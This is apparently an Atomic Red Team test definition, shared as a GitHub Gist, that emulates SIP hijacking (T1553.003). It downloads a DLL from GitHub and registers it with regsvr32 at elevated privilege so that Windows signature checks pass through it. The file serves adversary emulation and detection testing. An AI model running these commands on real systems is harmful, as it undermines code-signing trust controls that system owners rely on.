Created
October 11, 2023 11:18
-
-
Save MHaggis/e9d9cb130d7bc489e8b699e3f91871dd to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| attack_technique: T1553.003 | |
| display_name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking' | |
| atomic_tests: | |
| - name: SIP (Subject Interface Package) Hijacking via Custom DLL | |
| auto_generated_guid: e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675 | |
| description: | | |
| Registers a DLL that logs signature checks, mimicking SIP hijacking. This test uses a DLL from | |
| https://github.com/gtworek/PSBits/tree/master/SIP and registers it using regsvr32, thereby causing | |
| the system to utilize it during signature checks, and logging said checks. | |
| supported_platforms: | |
| - windows | |
| input_arguments: | |
| dll_payload: | |
| description: Path to GTSIPProvider.dll | |
| type: path | |
| default: PathToAtomicsFolder\T1553.003\bin\GTSIPProvider.dll | |
| dependency_executor_name: powershell | |
| dependencies: | |
| - description: | | |
| GTSIPProvider.dll must exist on disk at specified location (#{dll_payload}) | |
| prereq_command: | | |
| if (Test-Path "#{dll_payload}") {exit 0} else {exit 1} | |
| get_prereq_command: | | |
| New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null | |
| Invoke-WebRequest "https://github.com/gtworek/PSBits/raw/2aa885c7d09f7f100997bfa5ee0c404084177f24/SIP/GTSIPProvider.dll" -OutFile "#{dll_payload}" | |
| executor: | |
| command: | | |
| regsvr32.exe #{dll_payload} | |
| cleanup_command: | | |
| regsvr32.exe /u #{dll_payload} | |
| name: command_prompt | |
| elevation_required: true |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment